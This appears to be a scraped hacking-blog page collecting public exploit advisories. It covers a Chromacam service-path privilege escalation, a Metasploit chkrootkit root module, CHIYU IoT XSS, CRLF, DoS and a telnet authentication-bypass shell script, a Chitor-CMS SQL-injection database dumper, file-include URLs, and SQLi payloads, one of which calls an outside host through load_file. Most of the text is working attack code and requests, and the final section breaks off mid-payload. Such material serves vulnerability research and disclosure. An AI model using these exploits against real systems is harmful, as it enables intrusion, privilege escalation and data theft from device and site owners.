# Exploit Title: Chromacam 4.0.3.0 - PsyFrameGrabberService Unquoted Service Path
# Exploit Author: Laguin Benjamin (MONK-MODE)
# Discovery Date: 2023-19-01
# Vendor Homepage: https://personifyinc.com/
# Software Link: https://personifyinc.com/download/chromacam
# Tested Version: Chromacam-4.0.3.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 x64
# CVE: In progress
# Step to discover Unquoted Service Path:
C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"
|findstr /i /v "c:\windows\\" |findstr /i /v """
Personify Frame Transformer PsyFrameGrabberService C:\Program Files
(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe Auto
C:\>sc qc "PsyFrameGrabberService"
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: PsyFrameGrabberService
TYPE : 110 WIN32_OWN_PROCESS (interactive)
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files
(x86)\Personify\ChromaCam\64\PsyFrameGrabberService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Personify Frame Transformer
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>systeminfo
Host Name: DESKTOP-1000
OS Name: Microsoft Windows 10 Professionnel
OS Version: 10.0.19044 N/A build 19044
# Exploit
If an attacker had already compromised the system and the current user has
the privileges to write in the : C:\Program Files (x86)\ "C:\Program Files
(x86)\Personify" "C:\Program Files (x86)\Personify\ChromaCam" "C:\Program
Files (x86)\Personify\ChromaCam\64" folder or in "C:\" , he could place his
own "Program.exe" or "PsyFrameGrabberService.exe" files respectively, and
when the service starts, it would launch the malicious file, rather than
the original "PsyFrameGrabberService.exe".
The service starts automatically at bood and runs in system
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863131842
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class Metasploit4 < Msf::Exploit::Local
# This could also be Excellent, but since it requires
# up to one day to pop a shell, let's set it to Manual instead.
Rank = ManualRanking
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Chkrootkit Local Privilege Escalation',
'Description' => %q{
Chkrootkit before 0.50 will run any executable file named
/tmp/update as root, allowing a trivial privsec.
WfsDelay is set to 24h, since this is how often a chkrootkit
scan is scheduled by default.
},
'Author' => [
'Thomas Stangner', # Original exploit
'Julien "jvoisin" Voisin' # Metasploit module
],
'References' => [
['CVE', '2014-0476'],
['OSVDB', '107710'],
['EDB', '33899'],
['BID', '67813'],
['CWE', '20'],
['URL', 'http://seclists.org/oss-sec/2014/q2/430']
],
'DisclosureDate' => 'Jun 04 2014',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => ['shell', 'meterpreter'],
'Privileged' => true,
'Stance' => Msf::Exploit::Stance::Passive,
'Targets' => [['Automatic', {}]],
'DefaultTarget' => 0,
'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h
))
register_options([
OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit'])
])
end
def check
version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1")
if version =~ /chkrootkit version 0\.[1-4]/
Exploit::CheckCode::Appears
else
Exploit::CheckCode::Safe
end
end
def exploit
print_warning('Rooting depends on the crontab (this could take a while)')
write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n")
cmd_exec('chmod +x /tmp/update')
register_file_for_cleanup('/tmp/update')
print_status('Payload written to /tmp/update')
print_status('Waiting for chkrootkit to run via cron...')
end
end
# Exploit Title: CHIYU TCP/IP Converter devices - CRLF injection
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, and BF-450M TCP/IP Converter devices - all firmware versions < June 2021
# Tested on: BF-430, BF-431, and BF-450M
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A CRLF injection vulnerability was found on BF-430, BF-431, and BF-450M TCP/IP Converter devices from CHIYU Technology Inc due to a lack of validation on the parameter redirect= available on multiple CGI components.
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31249
Affected parameter: redirect=Component: all the CGI components
Payload: %0d%0a%0d%0a<script>alert(document.domain)</script>
====HTTP request======
GET
/man.cgi?redirect=setting.htm%0d%0a%0d%0a<script>alert(document.domain)</script>&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=&TF_port=&B_mac_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
======HTTP response========
HTTP/1.1 302 Found
Location: setting.htm
<script>alert(document.domain)</script>
Content-Length: 0
Content-Type: text/html
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to all CGI components
3. Append the payload at the end of the vulnerable parameter (redirect )
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.
# Exploit Title: CHIYU IoT Devices - Denial of Service (DoS)
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC - all firmware versions < June 2021
# Tested on: BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC
# CVE: CVE-2021-31642
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: A denial of service condition exists after an integer overflow in several IoT devices from CHIYU Technology, including BIOSENSE, Webpass, and BF-630, BF-631, and SEMAC. The vulnerability can be explored by sending an unexpected integer (> 32 bits) on the page parameter that will crash the web portal and making it unavailable until a reboot of the device.
CVE ID: CVE-2021-31642
CVSS: Medium- CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31642
Affected parameter: page=Component: if.cgi
Payload:
if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
====HTTP request======
GET
/if.cgi?redirect=AccLog.htm&failure=fail.htm&type=go_log_page&page=2781000
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/AccLog.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to the CGI component (if.cgi)
3. Append the payload at the end of the vulnerable parameter (page)
4. Submit the request and observe payload execution
Mitigation: The latest version of the CHIYU firmware should be installed
to mitigate this vulnerability.
# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
"""
Description: Several IoT devices from the CHIYU Technology firm are
vulnerable to a flaw that permits bypassing the telnet authentication
process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed
request, and an attacker may force the remote telnet server to believe that
the user has already authenticated. Several models are vulnerable,
including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""
#!/usr/bin/env python3
# usage: python3 exploit.py IP
import socket
import time
import sys
HOST = sys.argv[1]
PORT = 23
socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect_ex((HOST, PORT))
try:
print("[+] Try to connect...\n")
time.sleep(1)
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.recv(1024).strip()
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.recv(1024).strip()
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
result = s.recv(1024).strip()
if result != b'\xff\xfe\x01':
s.send(b"\x09")
result = s.recv(1024).strip()
if connect == 0 and "sername" not in str(result):
if b"\xff\xfe\x01" == result:
print("Connected! ;)\ntype: \"help\"\n\n")
while 1:
cmd = input("(CHIYU pwnShell:) $ ")
body = cmd+"\n"
s.send(body.encode('utf-8', 'ignore'))
result = s.recv(1024).decode('utf8', 'ignore')
if not len(result):
print("[+] CHIYU device not available, try
again ... (terminating)")
s.close()
break
print(result.strip('CMD>'))
b = "\n"
s.send(b.encode('utf-8', 'ignore'))
result = s.recv(1024).decode()
print(result.strip('CMD>'))
except KeyboardInterrupt:
print("\n[+] ^C Received, closing connection")
s.close()
except EOFError:
print("\n[+] ^D Received, closing connection")
s.close()
except socket.error:
print("[+] Unable to connect to CHIYU device.")
# Exploit Title: CHIYU IoT devices - 'Multiple' Cross-Site Scripting (XSS)
# Date: May 31 2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, BF-630, BF631-W, BF830-W, Webpass, BF-MINI-W, and SEMAC
# CVE: CVE-2021-31250 / CVE-2021-31641 / CVE-2021-31643
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
Description: Several versions and models of CHIYU IoT devices are vulnerable to multiple Cross-Site Scripting flaws.
#1: Multiple stored XSS in CHIYU BF-430, BF-431, and BF-450M IP converter devices
CVE ID: CVE-2021-31250
CVSS: Medium – CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31250
============= PoC 01 ===============
Affected parameter: TF_submask
Component: if.cgi
Payload: "><script>alert(123)</script>
HTTP Request:
GET
/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/ap_tcps.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_submask)
4. Submit the request and observe payload execution
============= PoC 02 ===============
Affected parameter: TF_hostname=Component: dhcpc.cgi
Payload: /"><img src="#">
HTTP request and response:
HTTP Request:
GET
/dhcpc.cgi?redirect=setting.htm&failure=fail.htm&type=dhcpc_apply&TF_hostname=%2F%22%3E%3Cimg+src%3D%22%23%22&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=%2F%22%3E%3Cimg+src%3D%22%23%22%3E&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/wan_dc.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (dhcpc.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_hostname)
4. Submit the request and observe payload execution
============= PoC 03 ===============
Affected parameter: TF_servicename=Component: ppp.cgi
Payload: "><script>alert(123)</script>
GET
/ppp.cgi?redirect=setting.htm&failure=fail.htm&type=ppp_apply&TF_username=admin&TF_password=admin&TF_servicename=%22%3E%3Cscript%3Ealert%28%27123%27%29%3B%3C%2Fscript%3E&TF_idletime=0&L_ipnego=DISABLE&TF_fixip1=&TF_fixip2=&TF_fixip3=&TF_fixip4=&S_type=2&S_baud=3&S_userdefine=0&AP_type=0&TF_port=443&TF_remoteip1=0.0.0.0&B_apply=APPLY
HTTP/1.1
Host: 192.168.187.143
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.143/wan_pe.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (ppp.cgi)
3. Append the payload at the end of the vulnerable parameter
(TF_servicename)
4. Submit the request and observe payload execution
============= PoC 04 ===============
Affected parameter: TF_port=Component: man.cgi
Payload: /"><img src="#">
GET
/man.cgi?redirect=setting.htm&failure=fail.htm&type=dev_name_apply&http_block=0&TF_ip0=192&TF_ip1=168&TF_ip2=200&TF_ip3=200&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&TF_port=%22%3E%3Cimg+src%3D%22%23%22%3E&B_mac_apply=APPLY
HTTP/1.1
Host: 192.168.187.12
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.187.12/manage.htm
Authorization: Basic OmFkbWlu
Connection: close
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (man.cgi)
3. Append the payload at the end of the vulnerable parameter (TF_port)
4. Submit the request and observe payload execution
#2: Unauthenticated XSS in several CHIYU IoT devices
CVE ID: CVE-2021-31641
Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31641
Component: any argument passed via URL that results in an HTTP-404
Payload: http://ip/<script>alert(123)</script>
Steps to reproduce:
1. Navigate to the webpage of the vulnerable device
2. On the web-browsers, you need to append the payload after the IP
address (see payload above)
3. Submit the request and observe payload execution
#3: Stored XSS in CHIYU SEMAC, BF-630, BF-631, and Webpass IoT devices
CVE ID: CVE-2021-31643
Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31643
Affected parameter: username=
Component: if.cgi
Payload: "><script>alert(1)</script>
HTTP request - SEMAC Web Ver7.2
GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=0000&MarkID=0000&CardID=000000&username=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2021&SM=2&SD=7&sy_h=16&sy_m=23&EY=2021&EM=2&ED=7&sy_h=16&sy_m=23&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=0&card=116&card=9&card=138
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=; remote=00000000
Upgrade-Insecure-Requests: 1
HTTP request - BIOSENSE-III-COMBO(M1)(20000)
GET
/if.cgi?redirect=EmpRcd.htm&failure=fail.htm&type=user_data&creg=0&num=&EmployeeID=3&MarkID=3474&CardID=00000000&emp_id=&username=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&Card_Valid=0&SY=2019&SM=11&SD=25&sy_h=15&sy_m=0&EY=2019&EM=11&ED=25&sy_h=15&sy_m=0&Activate=5&Usertype=0&group_list1=1&group_list2=0&group_list3=0&group_list4=0&Verify=1&Password=&Retype=&card=0&card=0&card=0&card=0&card=118&card=5&card=101&card=110
HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0)
Gecko/20100101 Firefox/87.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: pt-PT,pt;q=0.8,en;q=0.5,en-US;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Connection: close
Referer: http://127.0.0.1/EmpRcd.htm
Cookie: fresh=
Upgrade-Insecure-Requests: 1
Steps to reproduce:
1. Navigate to the vulnerable device
2. Make a GET request to component mentioned (if.cgi)
3. Append the payload at the end of the vulnerable parameter (username)
4. Submit the request and observe payload execution
# Exploit Title: CHIYU BF430 TCP IP Converter - Stored Cross-Site Scripting
# Google Dork: In Shodan search engine, the filter is "CHIYU"
# Date: 2020-02-11
# Exploit Author: Luca.Chiou
# Vendor Homepage: https://www.chiyu-t.com.tw/en/
# Version: BF430 232/485 TCP/IP Converter all versions prior to 1.16.00
# Tested on: It is a proprietary devices: https://www.chiyu-t.com.tw/en/product/rs485-to-tcp_ip-converter_BF-430.html
# CVE: CVE-2020-8839
# 1. Description:
# In CHIYU BF430 web page,
# user can modify the system configuration by access the /if.cgi.
# Attackers can inject malicious XSS code in "TF_submask" field.
# The XSS code will be stored in the database, so that causes a stored XSS vulnerability.
# 2. Proof of Concept:
# Access the /if.cgi of CHIYU BF430 232/485 TCP/IP Converter.
# Injecting the XSS code in parameter “TF_submask”:
# http://<Your Modem IP>/if.cgi?TF_submask=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E
==---------------------------------------------------------------
This email contains information that is for the sole use of the intended recipient and may be confidential or privileged. If you are not the intended recipient, note that any disclosure, copying, distribution, or use of this email, or the contents of this email is prohibited. If you have received this email in error, please notify the sender of the error and delete the message. Thank you.
---------------------------------------------------------------==!!
#!/usr/bin/python3
#######################################################
# #
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #
# Date: 2023/04/13 #
# ExploitAuthor: msd0pe #
# Project: https://github.com/waqaskanju/Chitor-CMS #
# My Github: https://github.com/msd0pe-1 #
# Patched the 2023/04/16: 69d3442 commit #
# #
#######################################################
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'
__author__ = 'msd0pe'
__version__ = '1.1'
__date__ = '2023/04/13'
class bcolors:
PURPLE = '\033[95m'
BLUE = '\033[94m'
GREEN = '\033[92m'
OCRA = '\033[93m'
RED = '\033[91m'
CYAN = '\033[96m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
class infos:
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "
import re
import requests
import optparse
from prettytable import PrettyTable
def DumpTable(url, database, table):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
columns = []
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
columns.append(i)
pass
except:
pass
x.field_names = columns
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
x.add_rows([i])
except ValueError:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
i = i.split("xzmdpl")
i.append("")
x.add_rows([i])
print(x)
def ListTables(url, database):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["TABLES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def ListDatabases(url):
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}
x = PrettyTable()
x.field_names = ["DATABASES"]
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"
u = requests.get(url + payload, headers=header)
try:
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)
r = r[0].replace('\"',"").split(',')
if r == []:
pass
else:
for i in r:
x.add_row([i])
except:
pass
print(x)
def Main():
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')
(options, args) = Menu.parse_args()
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump
""")
Menu.add_option_group(Examples)
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:
Menu.print_help()
print('')
print(' %s' % __description__)
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)
print(' Any malicious or illegal activity may be punishable by law')
print(' Use at your own risk')
elif len(args) == 0:
try:
if options.url != None:
if options.l_databases != None:
ListDatabases(options.url)
if options.database != None:
if options.l_tables != None:
ListTables(options.url, options.database)
if options.table != None:
if options.dump != None:
DumpTable(options.url, options.database, options.table)
except:
print("Unexpected error")
if __name__ == '__main__':
try:
Main()
except KeyboardInterrupt:
print()
print(infos.PROCESS + "Exiting...")
print()
exit(1)
source: https://www.securityfocus.com/bid/47395/info
chillyCMS is prone to multiple remote file-include vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow a remote attacker to obtain sensitive information or to execute arbitrary script code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
chillyCMS 1.2.1 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/core/helpers.include.php?file=[Ev!l-Sh3ll]
http://www.example.com/[path]/core/helpers.include.php?path=[Ev!l-Sh3ll]
http://www.example.com/[path]/core/helpers.include.php?fullpath=[Ev!l-Sh3ll]
# # # # #
# Exploit Title: Child Care Script 1.0 - SQL Injection
# Dork: N/A
# Date: 08.12.2017
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link: https://www.phpscriptsmall.com/product/child-care-script/
# Demo: http://ordermanagementscript.com/demo/childcare/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# 1)
# http://localhost/[PATH]/list?city=[SQL]&main_search=
#
# '+/*!11111UNION*/+/*!11111SELECT*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52--+-
#
# # # # #
## Title: ChiKoi-1.0 SQLi
## Author: nu11secur1ty
## Date: 01.12.2023
## Vendor: https://chikoiquan.tanhongit.com/
## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi
## Description:
The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.
The payload '+(select
load_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'
was submitted in the User-Agent HTTP header.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The attacker can steal all information from this system and can
seriously harm the users of this system,
such as extracting bank accounts through which they pay each other, etc.
## STATUS: HIGH Vulnerability - CRITICAL
[+] Payload:
```MySQL
---
Parameter: User-Agent (User-Agent)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND
9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNION
SELECT 6994) END))-- -
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)
Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND
(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT
(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR
---
```
[+] Online:
```MySQL
---
